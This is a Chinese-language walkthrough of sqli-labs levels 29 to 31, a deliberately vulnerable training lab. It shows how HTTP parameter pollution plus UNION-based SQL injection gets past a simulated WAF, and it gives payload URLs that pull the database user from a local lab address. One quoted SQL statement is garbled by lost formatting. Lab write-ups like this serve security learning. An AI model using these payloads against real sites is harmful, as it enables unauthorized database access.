本文主要来自于:https://www.cnblogs.com/lcamry/category/846064.html
29.less29-Protection with WAF
参考链接:https://www.cnblogs.com/lcamry/p/5762952.html
首先先看下tomcat中的index.jsp文件(说实话,我的tomcat里面index.jsp太多了,没注意去哪里找这个)
在apache的index.php中,sql语句为
sql="SELECT∗FROMusersWHEREid=′id' LIMIT 0,1";
因此我们根据HPP的原理,我们直接payload:【在这里我试了一下,把一个参数去掉也是可以的,额,走了个乖吧,这关主要的考点是HPP,所以还是按照他的来吧!】
http://192.168.10.208:8081/sqli-labs-master/Less-29/?id=1&id=-2%27union%20select%201,user(),3--+
至于如何注入到其他的内容,只需要自己构造union后面的sql语句即可。
30.less30-Protection with WAF-Double Quotes
类似于上一关,只是将闭合方式换成了双引号,如下图。
在这里给出一个查找当前用户的union注入语句,其余的语句还请读者自己发散思路啦!
http://192.168.10.208:8081/sqli-labs-master/Less-30/?id=1&id=-2"union select 1,user(),3--+
31.less31-FUN with WAF
类似于上一关,只是将闭合方式换成了双引号+括号,如下图。
在这里给出一个查找当前用户的union注入语句,其余的语句还请读者自己发散思路啦!
http://192.168.10.208:8081/sqli-labs-master/Less-31/?id=1&id=-2") union select 1,user(),3--+